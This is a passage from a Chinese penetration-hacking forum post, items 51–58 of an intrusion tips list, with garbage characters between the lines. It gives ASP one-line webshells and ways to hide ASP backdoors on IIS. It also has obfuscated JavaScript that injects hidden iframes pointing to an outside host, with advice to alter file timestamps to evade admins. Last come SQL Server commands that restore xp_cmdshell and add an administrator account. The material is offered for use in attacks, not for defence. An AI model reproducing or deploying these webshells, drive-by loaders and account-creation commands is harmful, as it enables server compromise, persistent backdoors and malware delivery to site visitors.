+ ]/ J* S, Y* C5 w
$ U1 Y' b0 B* Q" t0 l
51、log备份时的一句话木马:
' ^7 W3 J" O1 M: P* w" V
a).<%%25Execute(request("go"))%%25>
0 O+ Z* d+ {6 k! H, E( M
b).<%Execute(request("go"))%>
8 O7 E ^3 F* R) R& u7 z! P+ q
c).%><%execute request("go")%><%
6 H1 w& Q+ H; ~1 E& g1 v) P3 l
d).<script language=VBScript runat=server>execute request("sb")</Script>
5 w- c# O1 Z9 e x
e).<%25Execute(request("l"))%25>
4 D' ?. I3 U. V+ R0 A6 p% M! V; y; U
f).<%if request("cmd")<>"" then execute request("pass")%>
' {: t5 Z; E! `& \, F
# z9 y. w7 Y; l* e) z6 ]! @, g
52、at "12:17" /interactive cmd
0 R3 _5 Y* q! X3 C
执行后可以用AT命令查看新加的任务
" e; c) ^ }- P* Z+ k* z1 G/ l) j
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
+ a8 c m' }: f# t! u/ A! Q
6 `9 i/ g0 r& }* F' Z1 c1 u
53、隐藏ASP后门的两种方法
9 A/ N' ?7 ]% x+ l6 C& @; w
1、建立非标准目录:mkdir images..\
6 ~2 g$ ]. d6 g# X0 c& }
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
d5 g" A$ d' I W6 d* |
通过web访问ASP木马:http://ip/images../news.asp?action=login
9 h% z: k( b7 }: |, T
如何删除非标准目录:rmdir images..\ /s
8 I$ h2 H8 e6 p% t1 \. |0 N
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* ?. H. I: [: Q" C
mkdir programme.asp
' ~" R3 q$ } \- M' V- d9 y
新建1.txt文件内容:<!--#include file=”12.jpg”-->
8 r2 x& A; D6 @3 X
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
! w. ?0 G6 J% d; Y
attrib +H +S programme.asp
9 _ ~# j4 z0 q, |& F+ J
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
) Q/ G* R! l7 z: ~* M5 B
0 V4 S: J! N7 {& ~* z" W4 w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
' {3 V; j! m& w/ e9 a. D5 r' T/ j
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; S; V: {3 Z6 \$ @8 F
9 J5 Y. L+ E* V+ F' S1 Z/ Q
55、JS隐蔽挂马
& {4 [& V, d% c
1.
1 X7 `5 F6 H, w1 Y+ P3 m7 q
var tr4c3="<iframe src=ht";
+ h. m! ]/ B! ^5 l) g
tr4c3 = tr4c3+"tp:/";
$ }& ~0 [) `9 o- c7 N; \2 |; ^
tr4c3 = tr4c3+"/ww";
8 D9 {$ S+ X( s' \0 F
tr4c3 = tr4c3+"w.tr4";
* C6 U- F- m7 f( F. c# u+ h
tr4c3 = tr4c3+"c3.com/inc/m";
% r5 c; E9 v9 V; g0 p% J
tr4c3 = tr4c3+"m.htm style="display:none"></i";
8 P" o7 @' T( q; P+ U9 O, X
tr4c3 =tr4c3+"frame>'";
7 |' ?/ ~' p' i' Q' X% k4 K p1 s
document.write(tr4c3);
/ t' ? _9 q- q3 n
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 l* v" Q% @3 M, o6 c o
8 S, W) z O9 K, c1 w: o
2.
U# v# _* y0 z* `; H
转换进制,然后用EVAL执行。如
, d% @4 v4 N( ]) N0 o& U) |
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ W4 B' W. U; t4 u) x' k) b
不过这个有点显眼。
$ g4 S! @; c/ z( h; D8 s
3.
' L, `" W4 \+ G) i
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' y3 }- X' Q D" H2 b, o# A% m
最后一点,别忘了把文件的时间也修改下。
& }% j8 J" G$ t
- y5 e; d! o) ^8 I
56.3389终端入侵常用DOS命令
. @" B! ?# B. |" M# P
taskkill taskkill /PID 1248 /t
/ m) h6 D. `8 H' Q2 {4 |
( P5 l6 E- w8 g5 R+ d; Q
tasklist 查进程
7 I1 R: K3 Z; P
# y Y7 u$ a* E9 b! d% p8 s& T) v( W
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
: v; ~, L% c/ `6 t1 w% V
iisreset /reboot
$ `$ c$ ?' o0 y# O6 a7 O; X
tsshutdn /reboot /delay:1 重起服务器
3 M0 Y2 }; w2 t' y9 ?6 t9 b
& S. Q$ b8 ^! b! ~- R e; o& m$ A9 H# f
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
% x( `) Q( J3 |* S0 k
a! R2 h B! Z! I" [
query user 查看当前终端用户在线情况
% s) L, G. P% ]6 D
5 Q9 I) {8 m# e, d) h
要显示有关所有会话使用的进程的信息,请键入:query process *
6 ^9 P# o5 {: A' @$ x$ b* U3 i
/ t1 e \, q0 X2 z p" r; }$ c
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- Q; r6 |! l1 r! A
. O/ w6 @' G% G' e! J, }
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
+ \9 ~( l; @- _6 q p# ~
2 y& h' h% Z) k1 t4 e, B6 G1 L
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 d6 d. U6 A" y
$ I5 b @2 A3 @; T% C0 X/ T2 o
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 T# l/ ]3 V% @
m) l. T2 i6 d s
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
& K" p9 Q1 E+ I+ s+ V0 p
Q! R8 e+ o$ g' C _+ V
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 F9 V6 B) x: |5 B3 r
( f0 w3 v$ U' y
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
5 E3 Q$ B' P# K9 o* u+ g
: [6 N9 V \8 r
56、在地址栏或按Ctrl+O,输入:
/ ]. V* c6 U0 A. ]4 M R8 s
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- R% g* R( S$ N2 C
7 I% `; L9 r+ q8 r
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
4 V$ f" k# Y4 H; m
3 e3 D! t, }; k- n# H( y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
0 H% B4 d; ]) b" _& R7 Y# C' m# T
用net localgroup administrators是可以看到管理组下,加了$的用户的。
# L) z- X, w$ i% X
! m7 U- q) E) i6 \8 r: d
58、 sa弱口令相关命令
% M$ n/ `6 b# G
! `$ v' o; h3 J& ^ }$ |! R6 t. _
一.更改sa口令方法:
" c& U1 U+ `7 F
用sql综合利用工具连接后,执行命令:
* ` u9 O# K. U$ M& H; r. t; o+ I
exec sp_password NULL,'20001001','sa'
- L6 T. A# P0 O
(提示:慎用!)
/ |0 B) v9 ?" V5 G( a- E
z0 D P% |. \: q3 z! j
二.简单修补sa弱口令.
- {8 W) X* m7 c/ {) n+ u
" r7 F$ M4 h+ [2 W6 A
方法1:查询分离器连接后执行:
( G/ p: `0 _/ z M2 Z# ?8 ^8 A% R
if exists (select * from
! B/ T* U7 w' [4 M
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
# J; X+ ~4 e$ g
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
- C* |! I& @3 ?; {7 f& e- L7 |
/ S9 J* \) c% m# e5 B8 h4 m8 z( R
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
8 L: h) f& ~* o
0 |. j7 [; E, a5 e1 L
GO
8 \/ @2 e, k$ `: B4 J
' S; Z: d" {& u. t
然后按F5键命令执行完毕
9 {8 i/ J/ M. o
- y/ ]8 ^9 N! I z7 ^
方法2:查询分离器连接后
; J4 y4 @: d$ t- ], |, s: C
第一步执行:use master
- Q& z4 p: Y& w
第二步执行:sp_dropextendedproc 'xp_cmdshell'
% B5 `4 m1 |& Q! h% ?9 X4 t
然后按F5键命令执行完毕
# b; [' V1 E: R; E7 Q
, B3 r& D$ X. `( z* q
0 u1 t4 ^2 [) d, Z4 I
三.常见情况恢复执行xp_cmdshell.
1 @5 c$ R* h, i/ y( e e
; M8 j: Y# H U6 e! ~. y
8 f0 q1 r' K$ z! Y+ M' L) ?: m3 M
1 未能找到存储过程'master..xpcmdshell'.
t5 o. H7 d4 X1 @/ A1 t
恢复方法:查询分离器连接后,
4 I& {" f6 |3 l1 P' U; e+ U
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ `$ C% C0 [5 ?4 |7 k; I
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; d# G: R" E- J# m- E
然后按F5键命令执行完毕
' Y+ C' ]5 l5 e: J6 Z/ X% T
3 F- K1 U+ }% R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
4 m3 R( H4 E# h; n6 \6 X
恢复方法:查询分离器连接后,
, P+ t7 s3 w. U
第一步执行:sp_dropextendedproc "xp_cmdshell"
7 ~2 q' U" B* L' u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 B% l# R' A7 K8 q9 o! W7 C9 B
然后按F5键命令执行完毕
% _% l2 l3 b* _6 T. P" R3 T) ]
3 z7 J& e$ a7 D1 f0 l; {& u
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
# ~/ \3 L+ N" c: r$ W
恢复方法:查询分离器连接后,
. @3 Q2 O2 V0 K! z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: V( ~& j+ H, f
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
) S3 h) g% S. F
然后按F5键命令执行完毕
. R, t1 C( a8 l6 k4 Y6 A( P* k! ^
4 I0 L- C. B3 r$ Q/ P7 g( N- m/ y
四.终极方法.
4 J' x0 h9 h3 O2 R8 z" ]" \
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 ?0 i& ~! x& ~4 }/ Z y
查询分离器连接后,
+ l; y. g7 Z. {( R. O
2000servser系统:
\4 b; ~2 N( x: y! P/ T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
- s8 P% I, }2 H, g$ g7 h7 E
1 M3 Q( b! }( g% t* O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% i3 C( u: A+ o" z2 W' L# T4 l) A+ L$ l. o
5 T2 F7 b t! C8 H1 o' e# E5 s c
xp或2003server系统:
8 J4 y* E6 B+ i; @
3 u# c- k' J& I( a% S9 f5 A. D! S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
5 x. `( |/ v0 m# h. Q
- s# u- B/ h8 w: e, v1 U0 {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( `4 s. z8 L% z5 c
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2